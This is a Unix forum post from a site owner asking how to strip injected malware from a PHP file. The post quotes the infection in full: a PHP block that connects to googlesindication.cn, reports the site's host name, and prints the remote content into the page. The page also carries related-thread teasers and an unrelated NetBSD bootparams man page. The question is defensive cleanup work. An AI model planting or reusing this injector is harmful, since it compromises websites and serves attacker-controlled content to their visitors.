Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: remove malicious codes from a file
Top Forums Shell Programming and Scripting remove malicious codes from a file Post 302170184 by fed.linuxgossip on Sunday 24th of February 2008 11:52:36 PM
Old 02-25-2008
Take this example:


test.php file
##########
<?php
phpinfo();
?>
<?php
error_reporting(0);
$fn = "googlesindication.cn";
$fp = fsockopen($fn, 80, $errno, $errstr, 15);
if (!$fp) {
} else {
$query='site='.$_SERVER['HTTP_HOST'];
$out = "GET /links.php?".$query." HTTP/1.1\r\n";
$out .= "Host: googlesindication.cn\r\n";
$out .= "Connection: Keep-Alive\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$var .= fgets($fp, 128);
}
list($headers, $content) = explode("\r\n\r\n", $var);
print $content;
fclose($fp);
}
?>


[root@server #] awk '/<\?php/,/\?>/{next}1' test.php
[root@server #]
[root@server #]



I only want to clear malicious code, but it wipes out all.


Please advise.


Thanks
 

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

2. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

3. Shell Programming and Scripting

Removal of HTML ASCII Codes from file

Hi all, I have a file with extended ASCII codes in the description which needs to be removed. List of extended ascii codes "Œ", "œ", "Š", "š", "Ÿ", "ƒ", "-", "-", "‘", "'", "‚", "“", "”", "„","†", "‡", "•", "...", "‰", "€", "™" Sample data: Test Details-HAVE BEEN PUBLISHED... (1 Reply)
Discussion started by: btt3165
1 Replies

4. UNIX for Dummies Questions & Answers

Display file with escaped color codes

Hi, I have a file containing color codes: Fri May 25 17:13:04 2012: Starting MTA: exim4^ Loading cpufreq kernel modules...^How can I display it colorized on a linux terminal? (4 Replies)
Discussion started by: ripat
4 Replies

5. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

6. Debian

Malicious perl script

Relative newbie to Linux so please be kind and assume I've done little in the way of command line but i have been thrusted into this position. Here goes. There is a perl script on my box that is using me as a mail server. It is contacting other mail servers to the point of slowing down the box.... (20 Replies)
Discussion started by: dadprpus
20 Replies

7. UNIX for Beginners Questions & Answers

How to remove unused html codes from the file using UNIX?

Hi All, We have a HTML source which will be processed using a informatica workflow. In between these two we have a Unix script which transforms the file. We are getting an error from past week in the informatica saying invalid format, because the file has unused html reference (0-8,14-31 etc)... (2 Replies)
Discussion started by: karthik adiga
2 Replies

LEARN ABOUT NETBSD

bootparams

BOOTPARAMS(5)						      BSD File Formats Manual						     BOOTPARAMS(5)

NAME

     bootparams -- boot parameter database

SYNOPSIS

     /etc/bootparams

DESCRIPTION

     The bootparams file specifies the boot parameters that diskless(8) clients may request when booting over the network.  Each client supported
     by this server must have an entry in the bootparams file containing the servers and pathnames for its root, area.	It may optionally contain
     swap, dump, and other entry types.

     Each line in the file (other than comment lines that begin with a #) specifies the client name followed by the pathnames that the client may
     request by their logical names.  Names are matched in a case-insensitive fashion, and may also be wildcarded using shell-style globbing char-
     acters.

     The components of the line are delimited with blank or tab, and may be continued onto multiple lines with a backslash.

     For example:

	   dummy   root=server:/export/dummy/root 
		   swap=server:/export/dummy/swap 
		   dump=server:/export/dummy/swap 
		   gateway=router:255.255.255.0

     When the client named "dummy" requests the pathname for its logical "root" it will be given server ``server'' and pathname
     ``/export/dummy/root'' as the response to its RPC request.

	   netra[1-5]www*  root=server:/export/jumpstart/netra_www

     When any client with a name matching the pattern "netra[1-5]www*" requests the pathname for its logical "root" it will be given server
     ``server'' and pathname ``/export/jumpstart/netra_www'' as the response to its RPC request.  As this example implies, this is useful for set-
     ting up Jumpstart servers for Sun clients.

NOTES

     The server does not default to the localhost, and must be filled in.

FILES

     /etc/bootparams  default configuration file

SEE ALSO

     diskless(8), rpc.bootparamd(8)

BSD
								 February 28, 2002							       BSD
All times are GMT -4. The time now is 01:18 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy